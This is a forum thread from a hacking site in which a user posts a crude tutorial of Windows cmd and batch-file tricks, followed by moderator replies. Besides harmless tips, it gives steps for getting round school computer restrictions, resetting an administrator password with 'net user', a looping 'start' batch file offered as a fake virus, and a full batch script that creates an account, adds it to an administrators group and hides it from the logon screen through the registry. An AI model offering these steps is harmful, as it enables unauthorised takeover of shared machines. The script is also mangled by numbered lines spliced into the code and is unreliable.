cmd and notepad tricks/hacks + fun stuff

Wrote your own tutorial? Submit it here!
Post Reply
ashish
Newbie
Newbie
Posts: 1
Joined: 05 Jul 2010, 03:29
13

cmd and notepad tricks/hacks + fun stuff

Post by ashish »

:P

to open cmd press rum cmd or on vista serch cmd
all files should be saved as any name as long as .bat
if on school computer and you are restricted and cant acsess cmd open note pad and type command.com or start and save as bat open to start cmd




change colour of cmd

1. open cmd
2. type"color" and any number (color 45)
3. every number shows diffrent colours

showing messages

1. open notepad
2. first type "@echo off"
3. "echo any thing you want" as your massege (you can have any number of messages
4. "pauce" or "ping local host -n 3 >nul cls"
5. pauce is so you when you press a key you will continue to show msgs
6. ping .......... is so that you can make it that after 3 seconds it will continue
7. change the 3 the make diffrent seconds
8. to make a msg loop under @echo off type a and at the end type goto a
9. or at the end type the file name
10. save as .bat
11. n.b you can use this to create a fake virus

hex virus (this is not harmfull once you restart all will be normal)

1. open notepad
2. type 6"start" start =open cmd
3. Ifyou save now you will have cmd run for about 30 times
4. but if at the begginig you enter a and at the end enter goto a
5. or at the end of the text write the file name include .bat
6. it will keep going till ou restart

Going in to administrator account

1. at the log on screen press ctrl + alt + delete X2
2. enter "adminisrator" as username
3. press enter somtimes its with a pass (hardluck) but a lot of times its not

Hacking into admisitrator acoounts(much better)

1. open cmd
2. type in "net user"
3. a list of user will come up
4. Then type "net user (admin name) (a pass)"
5. or "net user (admin name) *
6. you will be asked to type and retype your password

creating any type of account(xp only)

1. open notepad
2. copy the following"@ECHO off
TITLE Admin Account Creator (651juan@CW)
COLOR 0f
set AC_PART=001
:HEADER
echo.
ECHO [INFO]
ECHO [-] Create a hidden user acount (U:%AC_NAME%; P:%AC_PASS%; G:%AC_GROUP%; H:%AC_HIDE% )
echo \
GOTO %AC_PART%
3.

:001
SET /P AC_NAME=
4. Account name? :
cls
SET AC_PART=002
GOTO HEADER
5.

:002
SET /P AC_PASS=
6. Account password? :
cls
SET AC_PART=003
GOTO HEADER
7. :003
SET /P AC_COMMENT=
8. Account Comment? :
cls
SET AC_PART=004
GOTO HEADER
9.

:004
ECHO [* The following groups are available on the machine.
ECHO.
net localgroup | find "*"
ECHO.
SET /P AC_GROUP=
10. Group? :
cls
SET AC_PART=005
GOTO HEADER
11.

:005
SET /P AC_OK=
12. Creating acount now, Continue? (y/n) :
IF NOT %AC_OK%==y GOTO 0051
net user %AC_NAME% %AC_PASS% /add /COMMENT:"%AC_COMMENT%"
net localgroup "%AC_GROUP%" %AC_NAME% /add
ECHO.
pause
13. :0051
cls
SET AC_PART=006
GOTO HEADER
14.

:006
SET /P AC_HIDE=
15. Do you want to hide the account from the XP logon screen? (y/n) :
IF NOT %AC_HIDE%==y GOTO END
echo Windows Registry Editor Version 5.00>%TEMP%\addregistry.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
16. NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]>>%TEMP%\addregistry.reg
echo "%AC_NAME%"=dword:00000000>>%TEMP%\addregistry .reg
Regedit /s %TEMP%\addregistry.reg
Del %TEMP%\addregistry.reg
:END
ECHO.
pause"
17. save as .bat
18. you will be asked for auser name
19. a pass word
20. comment anything you want
21. group any most common administrator
22. create y
23. you will be asked if you want to hide from log on screen
24. if yess to acsess account on log on screen press ctrl + alt + deletX2
25. enter user and pass

Trace a website from were it is

1. open cmd
2. type "ping http://www.cyberwarez.info" onclick="window.open(this.href);return false;" onclick="window.open(this.href);return false;"
3. and ip adress will apear next to name
4. go to ip-adress.com
5. and at the bottom there is ip tracking.......... press
6. in the box type the ip and there you have it
7. you can change the website

movie on cmd

1. open cmd
2. typre "telnet towel.blinkenlights.nl"

User avatar
Gogeta70
^_^
^_^
Posts: 3275
Joined: 25 Jun 2005, 16:00
18

Re: cmd and notepad tricks/hacks + fun stuff

Post by Gogeta70 »

Posting new topics in the tutorial forums is not allowed. I'm moving this to submissions.
¯\_(ツ)_/¯ It works on my machine...

User avatar
bad_brain
Site Owner
Site Owner
Posts: 11636
Joined: 06 Apr 2005, 16:00
19
Location: In your eye floaters.
Contact:

Re: cmd and notepad tricks/hacks + fun stuff

Post by bad_brain »

I kinda doubt it will be ever moved to the tuts...now that he's banned for spamming... :lol:
Image

Post Reply